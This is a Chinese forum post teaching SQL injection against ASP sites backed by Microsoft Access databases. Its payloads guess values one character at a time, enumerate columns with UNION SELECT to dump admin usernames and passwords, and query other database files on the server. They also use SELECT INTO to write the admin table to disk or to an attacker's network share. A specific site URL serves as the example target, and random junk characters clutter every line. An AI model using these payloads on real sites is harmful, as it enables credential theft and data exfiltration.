--------------------------------------------------------------
3 T8 i4 `$ B; Z* n2 ] o- z$ Nunion查询法
$ A. S# U! k6 C1 a3 C$ e首先要说的就是查询办法,一般的查询办法就是
7 A) i+ D$ G2 `# N7 C& H) E" r4 f' k- y7 c8 o" Y3 {
程序代码
8 `) b3 Y+ W( `and 1=(select count(*) from admin where left(id,1)='1')( g6 z j( [/ l# m! e8 I `
( J% b q& n8 Q) ^
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
0 j8 b, z7 D ?9 h1 L9 T5 ?所以这个时候,union select横空出现.别以为只能在PHP里用哦...; V$ @7 r, n) B9 M2 p# M. d; P
譬如你有一个ACCESS点:$ V- Y& `& M2 e) v, }- T
程序代码4 S( @' [$ X4 S c; b
http://bbs.tian6.com/xiaoyang.asp?coder=1+ h9 O! N) S7 ~$ J# X2 p
( _( h2 x t' H知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
4 m' Q" q9 `5 Z8 a0 B' Y然后我们直接来:2 `# e" @/ |: l6 f' T7 _
程序代码
. D' Z# c4 Z! O, J1 N& {; S9 A! Ahttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]. T9 h6 X* \- I# m
5 X H- j( Q3 |5 v& q这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
0 |+ b0 g$ n2 _( M
' e, A; g( e1 ~
% o3 @/ O9 M: |# y- p4 g; t8 K+ j6 t! e
---------------------------------------------------------------$ f: A" G$ m4 w4 B& X @0 D. H
Access跨库查询) l! |/ J# O9 }, v7 T( t4 \
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
4 X5 G: p9 @8 z跨库的查询语句:
. F, [! c1 } |子查询:
4 v r% a- A8 t8 J4 ~" J4 e ~程序代码# v" A& S: r% r% u5 G+ x
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
6 ]% I$ _3 h: E: z4 R- v. F; |5 `0 [% M2 R' [
union查询:
1 Q1 L) w# n5 X8 o f# x) m程序代码+ m3 E: _3 v2 H- Z
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
. O* T; Y9 S& k& U" O, o _
+ {; J# H1 F. i' O; F跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
/ K/ a+ ]) Q6 r' j" U$ w8 \3 d程序代码3 T9 `+ X& U; i. G2 K% U+ P& d2 s
http://www.4ngel.net/article/46.htm 4 M" J; u9 \8 l# T! N
http://hf110.com/Article/hack/rqsl/200502/66.html
1 T/ S6 z$ G8 m2 E8 ~' h; V* O8 `! }1 y: r, D5 i
---------------------------------------------------------------
; Z6 i$ s6 H0 K$ d' T6 Q2 XAccess注入,导出txt,htm,html7 E$ l' _$ T$ I- D
子查询语句:9 D+ J8 ]% E$ w$ O) W
程序代码. I t- h0 n1 P, D: U, N
Select * into [test.txt] in 'd:\web\' 'text;' from admin
4 m9 _) h( n# b# |' v
+ q* w$ ]' g2 ? m$ _9 f这样就把admin表的内容以test类型存进了d:\web里面.
( H- Y$ G, g3 i9 w1 |' zUNION查询:
6 k2 W: W4 U, r, a4 Y程序代码* X3 ~, U5 g+ N# c4 m
union select * into [admin.txt] in 'c:\' 'test;' from admin8 y7 }/ X q6 ^( _5 ~+ b4 e; v# _
( a$ w. m$ y, [0 D1 f7 Q4 C
而且这里也可以保存到本地来:. F* M7 E' e" m. @7 r
程序代码
7 z% X2 E* h# U# r# q: I5 JSelect * into [test.txt] in '\\yourip\share' 'text;' from admin1 h! l. A, Y: X
- z$ B. N! v3 I9 G: Y
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:, N3 i4 e/ N' G% g0 V6 j
/ R* T; Q; n& I( A4 Y* H
程序代码. _6 g! _$ E: y1 d% g& R1 K5 T9 X
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D70 ]$ c( J c M0 c8 x
$ U$ q9 J/ _8 A! t
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.5 C% V; d' B/ p# u0 `
|
发表于 2012-9-15 14:20:57
收藏
支持
反对